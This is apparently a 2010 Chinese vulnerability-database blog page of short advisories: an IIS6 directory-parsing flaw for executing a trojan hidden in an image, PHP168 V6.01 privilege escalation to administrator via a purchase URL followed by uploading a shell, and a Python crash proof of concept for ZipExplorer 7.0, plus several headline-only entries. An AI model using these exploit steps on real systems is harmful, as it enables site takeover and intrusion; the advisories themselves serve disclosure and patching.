Vulndb

Microsoft IIS6 解析目录“xxx.asp”漏洞

2010年6月20日 Vulndb 没有评论 | 热度：78 ℃

发布时间:2010-06-18

影响版本:IIS6.0 or lower

漏洞描述:

Application:Microsoft Internet Information Services (IIS)
Note:Tested on IIS 6.0 Work successfully
##########################################################

hackers build a directory called aaa.asp then aaa.asp directory put a picture
inside the Trojans , hackers access aaa.asp/xxx.jpg will be able to access trojan !

Original document:
http://blog.pouya.info/userfiles/vul/IIS0day.pdf

<*参考

http://blog.pouya.info/userfiles/vul/IIS0day.pdf
http://securitylab.ir/bt/IIS0day.zip

*>

安全建议:

Upgrade to IIS 7.0

PHP168 V6.01 权限提升漏洞

2010年6月20日 Vulndb 没有评论 | 热度：48 ℃

发布时间:2010-06-17

影响版本:PHP168 V6.01

漏洞描述:

PHP168整站是PHP领域当前功能最强大的建站系统，代码全部开源，可极其方便的进行二次开发，所有功能模块可以自由安装与删除，个人用户完全免费使用
HPCMS V6.01存在严重的安全问题

<*参考

http://www.nukeblog.cn/read.php/9.htm

*>

测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

注册一个帐户，进入会员中心。访问http：//youname.com/member/buygroup.php?job=buy&gid=3
你会看到如下字样。
你现在的级别是普通会员，你将要购买的级别是超级管理员，需要积分0

点击购买，如返回你现在级别是超级管理员等字样。返回会员中心查看一下
然后找到后台登录传shell即可

安全建议:

厂商补丁：
PHP168
--------
目前厂商已经提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.php168.net/

ZipExplorer 7.0 利用工具

2010年6月20日 Vulndb 没有评论 | 热度：40 ℃

作者：TecR0c

#!/usr/bin/python
dos = "\x41" * 2000
mefile = open('tecr0c.zar','w');
mefile.write(dos);
mefile.close();

利用方法：启动ZipExplorer 7.0,点击：Open，然后打到这个文件的位置，双击打开,完事儿。

ZipExplorer

nginx HTTP请求源码泄露和拒绝服务漏洞

2010年6月18日 Vulndb 没有评论 | 热度：48 ℃

SQL注射中使用Mysql load_file解析bsd目录的脚本

2010年6月18日 Vulndb 没有评论 | 热度：46 ℃

一段扫flash跨站的脚本

2010年6月18日 Vulndb 没有评论 | 热度：25 ℃

Flash
跨站

风讯网站管理系统API_Response.asp页面存在越权漏洞

2010年6月18日 Vulndb 没有评论 | 热度：25 ℃